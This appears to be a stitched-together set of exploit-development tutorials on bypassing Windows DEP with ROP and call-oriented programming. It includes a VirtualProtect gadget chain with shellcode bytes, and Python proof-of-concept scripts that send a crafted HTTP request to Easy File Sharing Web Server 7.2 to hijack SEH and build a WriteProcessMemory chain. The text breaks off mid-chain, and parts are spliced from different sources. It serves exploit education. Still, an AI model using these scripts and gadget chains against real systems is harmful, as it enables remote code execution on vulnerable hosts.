module. It was used to get ROP gadgets for msvcp140.dll. In order to prepare proper addresses
for the ROP chain, we need to determine a load address of msvcp140.dll and a base address of
msvcp140.dll. This load address is constant during the Windows sessions since we disabled
ASLR support before.It was originally published on https://www.apriorit.com/
If we run our application on the testing environment we can see that the load address of
msvcp140.dll in this Windows session will be 6a880000:
Using IDA-Pro we can determine that the base address for msvcp140.dll is 1000000
So the proper address for ROP gadgets will be calculated the next way:
ROP chain is specifically designed to bypass DEP by calling VirtualProtect() function and then
call our code in protected memory. The first thing that we need in an ROP chain is to prepare a
stack for the execution of Virtual Protect with flNewProtect parameter ==
PAGE_EXECUTE_READWRITE. It can be achieved in few steps:
1) charge registers with useful parameters. Particularly we want to fill edi with gadget
address 0x1002d588 to acquire a stack
0x1001e3ba : pop eax; pop edi; pop esi; pop ebp; ret
2) acquire a stack
0x1002d588 : and edi, esp; add byte ptr[eax], al; ret 0x18
3) configure a stack for calling VirtualProtect. We need to place VirtualProtect call address
from application IAT, return address and parameters continuously into the stack
0x1000cfab : mov eax, edi; pop edi; pop esi; pop ecx; pop ebp; ret
0x100110de : mov ecx, eax; mov eax, ecx; pop ebp; ret
0x10015ea3 : mov eax, dword ptr[eax]; ret
5) when VirtualProtect function returns the next chain of gadgets executed in order to move
ESP to the code payload that was placed in the test.txt right after our ROP chain:
a8310de 8bc8 mov ecx, eax; mov eax, ecx; pop ebp; ret
// mov esi,esp
0xEB, 0x22,
0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00,
0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6f, 0x78, 0x41, 0x00,
0x50,
// push eax
// mov ecx,eax
// lea ebx,[esi+15h]
0x53,
// push ebx
0x51,
// push ecx
0xFF, 0xD0,
// call eax
0xCC };
https://www.apriorit.com/dev-blog/434-rop-exploit-protection
https://www.youtube.com/watch?v=5FJxC59hMRY
The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory
corruption vulnerability as a result of an HTTP request.
The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is
normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take
the stack, where it is currently not controlled by us, and change the address to an address on
the stack that we control - and then return into it.
import sys
import os
import socket
import struct
http_request += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp
0x10022869. After sending the exploit POC - we will need to view the contents of the
exception handler with the WinDbg command !exchain.
As a breakpoint has already been set on the address inside of SEH, all that is needed to pass
the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and
we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the
stack.
As a point of contention, we have about 980 bytes to work with.
What is the goal of this method of bypassing DEP? The goal here is to not to dynamically
change permissions of memory to make it executable - but to instead write our shellcode,
dynamically, to already executable memory.
As we know, when DEP is enabled, memory is either writable or executable - but not both at
the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to
executable memory is a bit contradictory knowing this. If memory is executable, adhering to
DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily
marking memory pages as RWX while data is being written to a destination - even if that
destination doesn’t have writable permissions. After the write succeeds, the memory is then
marked again as execute only.
From an adversary’s perspective, this means something. Certain shellcodes employ encoding
mechanisms to bypass character filtering. If this is the case, encoded shellcode which is
dynamically written to execute only memory will fail when executed. This is due to the
encoded shellcode needing to “write itself” over adjacent process memory to decode. Since
pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to
execute only memory anymore, an access violation will occur. Something to definitely keep in
mind.
Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this
(per Microsoft Docs)
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
Let’s break down the call to WriteProcessMemory() by taking a look at each function
argument.
3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address
specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode +
NOPs, if necessary, will be).
One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually -
each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take
the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the
stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and
due to the dynamic nature of the stack, the virtual memory addresses associated with the
stack are also dynamic.
As seen below, when the stack pivot is successfully performed, the virtual address of the stack
is 0x029a68dc.
Restarting the application and pivoting to the stack again, the virtual address of the stack is
at 0x028068dc.
At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of
each module, and their static nature - the stack still seems to change! Although the stack is
dynamically being resolved to seemingly “random” and “volatile to the duration of the
process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets,
properly - we can dynamically store an address around the stack into a CPU register.
Let’s start our ROP chain by preserving an address near the current stack pointer.
As you may or may not know, the base pointer (EBP) points to the “bottom” of the current
stack frame (we will refer to the current stack frame as “the stack”). This means that EBP
should be relatively close to ESP. We can validate this in WinDbg by viewing the current state
of the CPU registers after the stack pivot.
After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use
rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can
help us preserve the address of EBP into another “common” register, which has more useful
ROP gadgets as we will see later on, such as EAX.
Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the
above address. After firing off the updated PoC, we land on our intended ROP gadget.
After executing the above gadget, EAX is now loaded with an address near the current stack.
Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.
Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which
now contains the old value of EBP) is 0xfec bytes away from ESP.
To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.
Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating
EAX to contain the address of ESP + 0x38).
As we will see later on, we would like to preserve an address around ESP into another
“common” register, ECX. ECX is a register that is used as a “counter” (although technically it is
a general purpose register). This means that ECX generally is a part of some more useful ROP
gadgets.
In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the
value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available
within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24,
resulting in collateral damage to get what we need accomplished, accomplished. There will be
4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of
0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp,
0x24 gadget is executed (0x38 - 0x24 = 0x14).
This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we
will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP
gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24.
However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp,
0x24 instruction, EAX will contain a value of ESP + 0x10.
Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of
ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.
Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of
ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense
now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time
being.
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance
between the current value of EAX and ESP + 0x38).
Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded
0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX
will contain NULL bytes - which will kill our exploit. Instead, we will use the negative
representation of numbers and perform subtraction in order to get around this problem.
After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop
ecx gadget.
The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.
Program execution then transfers to the sub eax, ecx ROP gadget, which will place the
difference into the EAX register.
The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do
this for us.
0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret ; (1 found)
This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur -
which is meaningless because ECX and EAX already contain the same value - meaning this part
of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes,
which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well,
but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution
flow off.
leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.
mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.
We know that currently EAX contains our target address. We also can recall from earlier that
EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes
- it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov
esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that
occurs before the leave instruction - this would actually end up setting ESP to ESP, which is
what we want. The goal here is to restore ESP back to our controlled data, which consists of
our ROP gadgets.
It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at
the moment. Viewing this step by step in the debugger will help make sense of all of this.
Note, after each gadget - obviously the value of ESP changes. For completeness sake, until we
hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38
(even though the offset will technically shrink after each gadget is executed).
First, as mentioned above, we need to get the value in EAX into EBP to prepare for
the leave instruction.
How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains
the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0,
which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially
“moving” the address into EBP.
Let’s step through all of this in WinDbg - to make things a bit more clear.
Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.
After EBP is prepared, program execution reaches the next ROP gadget.
After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.
Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as
ECX (which is already equal to EAX) is placed into EAX.
Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop
ebx between the address before 0xCCCCCCCC
Program executing has also reached the add esp, 0x24 instruction.
Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and
EBP.
Then, pop ebx clears the last bit of “padding” on the stack.
After all of this has occurred, the leave instruction is loaded up for execution.
leave ; ret is executed, and the execution of our ROP chain resumes its course - all while
preserving ESP into ECX and EAX!
WriteProcessMemory() Parameters
Recall that we are dealing with the x86 architecture, meaning function calls go
through __stdcall instead of __fastcall. This means that instead of placing our function
arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our
parameters on the stack, as such.
To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we
can leverage the Import Address Table (IAT).
Whenever a program calls a Windows API function - it does not do so directly. A special table,
within the process space, known as the IAT essentially contains pointers to each needed API
function.
The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.
As is seen in the image above, the IAT just contains pointers to Windows API functions.
Meaning each of these functions points to a Windows API function.
We have “the base address” of each module (in reality, each module is just not compiled with
ASLR) - so that is no problem. However, the value that each of these functions points to (which
is a Windows API function) will change upon reboot.
The way to get around this, would be to load one of these IAT entries into a register we control
(such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.
This would extract whatever ECX points to (which is a Windows API function) and place it into
ECX. Even though Windows will randomize the addresses of the API, we can still leverage the
fact each IAT will always point to the same Windows API function (even if the address of the
API changes) to make sure this is not a problem.
Although the IAT for this application doesn’t directly contain a function pointer
to kernel32WriteProcessMemory - it does contain pointers to other kernel32.dll pointers, such
as kernel32!WriteFileImplementation. We also know that the distance between each function
with a DLL DOESN’T CHANGE. This means, the distance
between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always
remain the same for the current patch level and OS version.
This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.
The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this
will be used as the address in which program execution will transfer to AFTER the call
to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.
sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this
DLL is required for the application to work, we can target it as a place to write our shellcode.
With this method of ROP, we need to find an executable portion of memory within the
application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will
write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in
WinDbg, we can determine the .text section of the portable executable has execute
permissions. Also recall that even without write permissions, we can still write our shellcode if
we “proxy” the write through the API call.
Viewing the .text section address - we can see that the address chosen is just an executable
“code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the
program shouldn’t care.
This means, after the function call is completed and our shellcode is written here - program
execution will transfer to this address.
The handle parameter is quite easy to fill - we can even use a static value. According to
Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically,
it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1
or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means,
whenever a Windows API function requests a handle (generally in user mode),
passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since
we would like to write our shellcode to memory within the process space -
passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we
would like to write the memory to virtual memory within the current process space.
lpBaseAddress will be the address of our shellcode, as already outlined by the “return”
parameter.
lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We
will dynamically resolve this with ROP gadgets.
We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86
at least), where we will place these parameter “placeholders” on the stack and then
dynamically change what these parameters point to in order to make a successful function call.
Here is the PoC we will be using.
import sys
import os
import socket
import struct
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled
module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
gadget which moves EAX into EAX vai "leave")
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx
; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebp in leave instruction)
http_request += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
The above PoC places the parameters on the stack and also performs a “jump” over them
with add esp, 0x1C. Let’s examine this in the debugger.
The following is the state of the stack - with the kernel32!WriteProcessMemory parameters
outlined in red.
The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we
can see the stack moves further down.
We can see that we have moved further into our buffer, where our future ROP gadgets will
reside. The parameters for the function call are now “behind” where program execution is -
meaning we will not inadvertently corrupt these parameters because they are not within the
current execution flow.
Now that this is out of the way - we can “officially” begin our ROP chain to obtain code
execution.
lpBuffer
The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to
the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a
source buffer and write it somewhere else. Since we have control of the stack, we will just
preemptively place our shellcode there. This is where the headache of storing an address near
the stack in EAX and ECX will come into play.
As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.
The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.
Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not
the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be
reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we
would be reading the actual value of 0x11111111.
The first part of the image above shows the value of the address itself. The second part of the
image shows what happens when we “dereference” (using poi in WinDbg), or extract the value
a memory address is pointing to. We can leverage this, by using an arbitrary write primitive.
When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX,
but rather dword ptr [ecx] - which will force the address on the stack (which contains the
parameter placeholder) to point to something other than 0x11111111.
Remember - every time the process is terminated and restarted - the virtual memory on the
stack changes. This is why we need to dynamically resolve this parameter, instead of
hardcoding an address.
We will use the following ROP gadgets, in order to make ECX contain the stack address holding
the lpBuffer parameter placeholder.
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
Two things about the above ROP gadgets. First, the clc instruction.
clc is an assembly instruction that clears the “carry” flag (the CF register). None of our ROP
gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides
in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are
not using the EDX register for anything - so this instruction will not consequently disrupt what
we are trying to achieve.
Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10
hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away
(24 decimal bytes).
This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar
to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the
stack address of our shellcode and dword ptr [ecx] contains the stack address which is
currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX
is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our
shellcode.
However, there were no such gadgets that were found easily in the process memory. The
closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10
instead of 0x18 - due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 =
0x8).
The key is now to give some padding between the space on the stack for our future ROP
gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on
the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP
gadgets and choose a place on the stack that our shellcode will go, and start performing these
calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we
would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we
would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we
will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following
ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into
EAX.
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
The location where our shellcode will be (your location can be different, depending on how far
down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our
shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for
just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte
problem would kill our exploit. This is because a 32-bit register, like EAX, needs the
value 0x000002dc to completely fill its contents. To address this, we can use negative numbers
and subtraction to yield the same result!
The negative representation of 0x2dc will be loaded into ESI. We will then need to also
compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so
no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the
difference in EAX. This will result in the address of where our shellcode will go being placed
into EAX. Additionally, we need compensate for two pop gadgets.
Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating
gadget(s).
Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as
expected.
Program execution then redirects to the EAX manipulation routine.
The last step is to utilize the following ROP gadget to change the lpBuffer parameter
placeholder to point to the legitimate parameter (which is the shellcode location down the
stack).
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-
ASLR enabled module)
Program execution reaches the gadget in question.
As we can already see from the image above, 0x11111111 (which is the parameter placeholder
for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the
stack address which points to our shellcode.
State of the lpBuffer parameter placeholder before the instruction is stepped through.
After stepping through the instruction - we can see the lpBuffer parameter placeholder has
been dynamically changed to the correct address!
nSize
nSize, as you can recall from earlier, refers to the size of our region of memory we would like
written in the process space. We would like the size of our shellcode to be about 0x180 bytes
(384 decimal) - as this is more than enough for any type of shellcode.
Since ECX and EAX are being used for stack addresses - let’s use another register for this
parameter. Let’s use EDX.
Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of
0x20.
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is
placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and
pick up the next gadget.
Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our
ROP chain, as execution will not redirect back to the stack. However, there is a way around this
- with a technique called Call-oriented Programming (COP).
Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would
perform an add esp, X ; ret. Why add, esp X you may ask?
As you may, or may not, know - when a call instruction is executed - it pushes its return
address onto the stack. This is done so the caller knows where to return after it is done
executing. However, we can just execute an add esp X gadget to jump over this return address
and back into our ROP chain. However, there is one more thing that we need to take into
account from our gadget, and that is push edx.
This will push the EDX register onto the stack before the call instruction pushes its return
address onto the stack - meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the
stack. To compensate for this, we will load an add esp, 0x8 ; ret.
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled
module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
First, program execution hits our pop edi instruction, which will load the “return to the stack”
ROP gadget into EDI.
pop edi places the instruction into EDI.
The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.
Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until
EDX has been filled with 0x180.
push edx is then executed, resulting in EDX being placed onto the stack.
call edi is now about to be executed. Stepping through the instruction, with t in WinDbg,
pushes the caller’s return address onto the stack.
Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the
stack - where the exact same routine will be repeated until 0x180 is placed into EDX.
After repeating the routine, EDX now contains 0x180.
Now that EDX contains our intended value of 0x180, we can eventually use the same mov
dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended
value of 0x180.
We used the ECX register, which currently still contains the address on the stack that holds the
now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last
time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes
behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).
As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted
by 0x22222222).
Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 12 (0xC)
decimal bytes, to load the parameter placeholder address for nSize.
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
